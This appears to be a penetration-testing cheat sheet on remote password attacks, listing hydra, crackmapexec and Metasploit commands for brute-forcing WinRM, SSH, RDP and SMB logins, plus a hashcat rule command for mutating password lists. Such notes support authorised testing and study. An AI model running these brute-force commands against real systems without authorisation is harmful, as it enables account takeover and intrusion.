Remote Password Attacks
WinRM Brute Force
crackmapexec winrm <IP> -u user.list -p password.list
SSH Brute Force
hydra -L user.list -P password.list ssh://<IP>
RDP Brute Force
hydra -L user.list -P password.list rdp://<IP>
SMB Brute Force
# Hydra
hydra -L user.list -P password.list smb://<IP>
# Metasploit
use auxiliary/scanner/smb/smb_login
Password Mutations
# Update Password List
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
Last updated